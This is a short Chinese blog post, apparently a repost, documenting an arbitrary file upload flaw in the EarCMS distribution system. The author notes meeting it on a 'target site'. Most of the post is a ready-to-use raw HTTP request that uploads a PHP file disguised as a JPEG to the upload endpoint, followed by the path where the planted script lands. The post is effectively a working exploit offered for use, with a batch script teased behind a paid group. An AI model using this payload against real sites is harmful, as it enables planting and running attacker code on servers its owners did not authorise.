很久之前就研究过这个洞 到现在都忘了 今天在目标站遇见了就记录下来吧
Payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| POST /source/pack/upload/index-uplog.php HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 322
------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="app"; filename="funny.php"
Content-Type: image/jpeg
<?php phpinfo();;unlink(__FILE__);?>
------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="time"
test //这是文件名
------WebKitFormBoundaryZWa8hDK6XlSEJhi7--
|
go后会在 /data/tmp/ 下生成 test.php 文件
批量脚本就不放了 有兴趣可以一起进星球交流
扫一扫,加入信安圈。
文章来源: https://www.safeinfo.me/2020/06/26/earcms%E5%88%86%E5%8F%91%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
如有侵权请联系:admin#unsafe.sh